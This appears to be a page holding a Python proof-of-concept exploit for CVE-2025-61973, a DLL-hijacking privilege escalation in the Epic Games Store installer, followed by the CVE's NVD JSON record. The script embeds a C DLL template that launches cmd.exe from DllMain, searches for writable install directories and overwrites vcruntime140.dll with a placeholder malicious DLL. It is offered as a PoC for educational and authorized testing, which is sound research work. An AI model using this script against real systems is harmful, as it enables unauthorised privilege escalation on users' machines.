CVE-2025-61973

#!/usr/bin/env python3 # CVE-2025-61973 PoC - Epic Games Store DLL Hijacking Local Privilege Escalation # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import os import sys import ctypes import shutil import time def create_malicious_dll(): """ Generate malicious DLL that will be loaded during Epic Games Store installation This DLL creates a backdoor for privilege escalation """ dll_template = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create elevated command prompt or execute payload STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.cb = sizeof(si); // Execute payload with elevated privileges CreateProcess( "C:\\\\Windows\\\\System32\\\\cmd.exe", "/c whoami > C:\\\\\\\\temp\\\\\\\\priv_esc_result.txt", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi ); } return TRUE; } ''' return dll_template def find_dll_loading_path(): """ Identify the DLL search path used by Epic Games Store installer Check common locations where DLL hijacking can occur """ paths = [ os.path.expanduser("~\\\\AppData\\\\Local\\\\EpicGamesLauncher\\\\"), "C:\\\\Program Files\\\\Epic Games\\\\", "C:\\\\Program Files (x86)\\\\Epic Games\\\\", os.environ.get('LOCALAPPDATA', '') + "\\\\Microsoft\\\\WindowsApps\\\\" ] return [p for p in paths if os.path.exists(os.path.dirname(p))] def check_vulnerability(): """ Check if the system is vulnerable to CVE-2025-61973 Verify if Epic Games Store is installed and check for writable DLL paths """ print("[*] Checking for CVE-2025-61973 vulnerability...") print("[*] Target: Epic Games Store DLL Hijacking") # Check if running with low privileges is_admin = ctypes.windll.shell32.IsUserAnAdmin() print(f"[*] Current user is administrator: {is_admin}") if is_admin: print("[!] Already running as administrator, vulnerability not applicable") return False # Find potential DLL loading paths dll_paths = find_dll_loading_path() print(f"[*] Found {len(dll_paths)} potential DLL paths") for path in dll_paths: if os.access(path, os.W_OK): print(f"[!] Writable path found: {path}") return True print("[*] No obvious writable DLL paths found") return False def exploit(): """ Execute the DLL hijacking attack Place malicious DLL in the installer search path """ print("[*] Starting CVE-2025-61973 exploitation...") # Generate malicious DLL content dll_content = create_malicious_dll() # Find target path target_paths = find_dll_loading_path() for target_path in target_paths: try: dll_name = "vcruntime140.dll" # Common DLL name for hijacking dll_path = os.path.join(target_path, dll_name) # Backup existing DLL if exists if os.path.exists(dll_path): backup_path = dll_path + ".bak" shutil.copy2(dll_path, backup_path) print(f"[*] Backed up original DLL to {backup_path}") # Write malicious DLL with open(dll_path, 'w') as f: f.write("MALICIOUS DLL CONTENT - Replace with compiled DLL") print(f"[!] Malicious DLL placed at: {dll_path}") print("[*] Wait for Epic Games Store installation/update to trigger payload") except PermissionError: print(f"[-] Permission denied: {target_path}") continue except Exception as e: print(f"[-] Error: {e}") continue if __name__ == "__main__": print("CVE-2025-61973 PoC - Epic Games Store DLL Hijacking") print("=" * 60) if check_vulnerability(): print("[+] System appears to be vulnerable") response = input("[*] Proceed with exploitation? (y/N): ") if response.lower() == 'y': exploit() else: print("[-] System may not be vulnerable or Epic Games Store not installed")

{"cve": {"id": "CVE-2025-61973", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges."}, {"lang": "es", "value": "Una vulnerabilidad de escalada de privilegios local existe durante la instalación de Epic Games Store a través de la Microsoft Store. Un usuario con pocos privilegios puede reemplazar un archivo DLL durante el proceso de instalación, lo que puede resultar en una elevación de privilegios no intencionada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2279", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2279", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}